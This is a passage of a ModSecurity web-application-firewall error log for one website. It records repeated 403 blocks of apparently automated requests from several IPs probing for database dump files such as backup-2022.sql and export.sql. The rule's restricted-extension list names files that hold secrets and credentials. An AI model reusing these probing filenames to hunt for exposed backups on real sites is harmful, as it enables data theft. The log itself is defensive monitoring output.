"960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-ru.sql"] [unique_id "ZoqxDHug2jzbr_AlO3dxpQAAANQ"] [Sun Jul 07 10:15:25.514881 2024] [:error] [pid 31926:tid 139722626148096] [client 185.241.208.115:33142] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-investigacionperu.sql"] [unique_id "ZoqxDXug2jzbr_AlO3dxpgAAAMU"] [Sun Jul 07 10:15:26.475377 2024] [:error] [pid 31926:tid 139722609362688] [client 185.241.208.115:33144] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nvestigacionperu-2023.sql"] [unique_id "ZoqxDnug2jzbr_AlO3dxpwAAAMc"] [Sun Jul 07 10:15:27.301203 2024] [:error] [pid 31926:tid 139722642933504] [client 185.241.208.115:33146] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/export.sql"] [unique_id "ZoqxD3ug2jzbr_AlO3dxqAAAAMM"] [Sun Jul 07 10:15:29.437407 2024] [:error] [pid 31926:tid 139722659718912] [client 185.241.208.115:33148] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/eru_2023.sql"] [unique_id "ZoqxEXug2jzbr_AlO3dxqQAAAME"] [Sun Jul 07 10:15:30.002121 2024] [:error] [pid 30828:tid 139722600969984] [client 5.79.66.19:33150] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_default.sql"] [unique_id "ZoqxEjbJWLg2ecbngu9HwwAAAIg"] [Sun Jul 07 10:15:30.443014 2024] [:error] [pid 30827:tid 139722651326208] [client 5.79.66.19:33152] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu-2023.sql"] [unique_id "ZoqxEkGuaLybMBNkB61tTAAAAEI"] [Sun Jul 07 10:15:30.844941 2024] [:error] [pid 30827:tid 139722592577280] [client 5.79.66.19:33154] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/onperu-2023.sql"] [unique_id "ZoqxEkGuaLybMBNkB61tTQAAAEk"] [Sun Jul 07 10:15:31.271276 2024] [:error] [pid 31926:tid 139722617755392] [client 5.79.66.19:33156] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/cionperu-2022.sql"] [unique_id "ZoqxE3ug2jzbr_AlO3dxqgAAAMY"] [Sun Jul 07 10:15:31.715668 2024] [:error] [pid 30828:tid 139722508650240] [client 5.79.66.19:33158] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu-2022.sql"] [unique_id "ZoqxEzbJWLg2ecbngu9HxAAAAJM"] [Sun Jul 07 10:15:32.178370 2024] [:error] [pid 30828:tid 139722584184576] [client 5.79.66.19:33160] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-nvestigacionperu.sql"] [unique_id "ZoqxFDbJWLg2ecbngu9HxQAAAIo"] [Sun Jul 07 10:15:32.611326 2024] [:error] [pid 30828:tid 139722525435648] [client 5.79.66.19:33162] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup-2022.sql"] [unique_id "ZoqxFDbJWLg2ecbngu9HxgAAAJE"] [Sun Jul 07 10:15:33.032693 2024] [:error] [pid 30828:tid 139722475079424] [client 5.79.66.19:33164] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/tigacionperu_2023.sql"] [unique_id "ZoqxFTbJWLg2ecbngu9HxwAAAJc"] [Sun Jul 07 10:15:33.462759 2024] [:error] [pid 30828:tid 139722651326208] [client 5.79.66.19:33166] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_gacionperu.sql"] [unique_id "ZoqxFTbJWLg2ecbngu9HyAAAAII"] [Sun Jul 07 10:15:33.909888 2024] [:error] [pid 31926:tid 139722634540800] [client 5.79.66.19:33168] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-cionperu.sql"] [unique_id "ZoqxFXug2jzbr_AlO3dxqwAAAMQ"] [Sun Jul 07 10:15:34.355291 2024] [:error] [pid 30828:tid 139722517042944] [client 5.79.66.19:33170] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ionperu-2022.sql"] [unique_id "ZoqxFjbJWLg2ecbngu9HyQAAAJI"] [Sun Jul 07 10:15:34.825132 2024] [:error] [pid 30828:tid 139722483472128] [client 5.79.66.19:33172] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-acionperu.sql"] [unique_id "ZoqxFjbJWLg2ecbngu9HygAAAJY"] [Sun Jul 07 10:15:35.243707 2024] [:error] [pid 30828:tid 139722642933504] [client 5.79.66.19:33174] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ionperu-2023.sql"] [unique_id "ZoqxFzbJWLg2ecbngu9HywAAAIM"] [Sun Jul 07 10:15:35.685173 2024] [:error] [pid 31926:tid 139722567399168] [client 5.79.66.19:33178] [client 5.79.66.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_backup.sql"] [unique_id "ZoqxF3ug2jzbr_AlO3dxrAAAAMw"] [Sun Jul 07 10:15:36.429334 2024] [:error] [pid 31926:tid 139722525435648] [client 204.137.14.106:33182] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-igacionperu.sql"] [unique_id "ZoqxGHug2jzbr_AlO3dxrQAAANE"] [Sun Jul 07 10:15:37.413554 2024] [:error] [pid 31926:tid 139722559006464] [client 204.137.14.106:33184] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db_file.sql"] [unique_id "ZoqxGXug2jzbr_AlO3dxrgAAAM0"] [Sun Jul 07 10:15:38.311443 2024] [:error] [pid 31926:tid 139722475079424] [client 204.137.14.106:33186] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup2022.sql"] [unique_id "ZoqxGnug2jzbr_AlO3dxrwAAANc"] [Sun Jul 07 10:15:39.198154 2024] [:error] [pid 31926:tid 139722533828352] [client 204.137.14.106:33188] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/acionperu_2023.sql"] [unique_id "ZoqxG3ug2jzbr_AlO3dxsAAAANA"] [Sun Jul 07 10:15:39.992033 2024] [:error] [pid 31926:tid 139722483472128] [client 204.137.14.106:33190] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ 